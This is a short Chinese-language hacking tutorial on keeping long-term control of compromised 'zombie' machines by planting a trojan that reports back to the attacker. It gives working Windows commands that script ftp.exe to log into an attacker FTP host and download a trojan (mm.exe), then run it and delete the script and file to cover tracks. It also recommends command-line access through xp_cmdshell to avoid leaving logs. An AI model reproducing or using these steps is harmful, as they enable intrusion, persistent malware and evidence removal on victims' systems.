下文说一下搞定了肉鸡，如何保持长久上线，防止动态ip或者域名变化导致找不到肉鸡。这需要种植木马，且这个木马要能够往外面咱们自己的服务器或者邮箱等报告自己的运行状态。如何下载木马并种植到肉鸡上面的问题，其实网上也有零散的，我这儿算是整理，同时加上自己的体会。大家还是多实践，多搞搞肉鸡。

（最好练习命令行，3389登陆上去一对记录，如被追踪很危险的。其实我更相信，图形界面下能操作的，命令行都能操作正如windows下能搞的，linux下都能做到），这儿命令行可以是ms sql1433得到的xp_cmdshell等。木马下载无非是ftp跟http的网页下载两种方式，这儿分别介绍：

1.ftp下载
这儿是使用肉鸡system32目录下的ftp.exe来访问我们放置木马的ftp服务。显然要解决输入帐号密码的问题，同时要制定命令让远程的ftp.exe执行，从而下载文件。还好，这些都可以通过命令来解决。假设木马文件在服务器ftpxx.3322.org下，帐号为ftpxx,密码为3322，文件为mm.exe。

通过命令行
===========================
echo ftpxxx>ftp.txt
echo 3322>>ftp.txt
echo get mm.exe>>ftp.txt
echo bye>>ftp.txt
ftp -s:ftp.txt ftpxx.3322.org
===========================
则根据前一篇文章的&用法，也可以用一句命令完成：
echo ftpxxx>ftp.txt & echo 3322>>ftp.txt & echo get mm.exe>>ftp.txt & echo bye>>ftp.txt & ftp -s:ftp.txt ftpxx.3322.org
这样就下载成功了。
下一步是执行木马并删除记录：
也就是一句话(三个语句）:
mm.exe & del ftp.txt & del mm.exe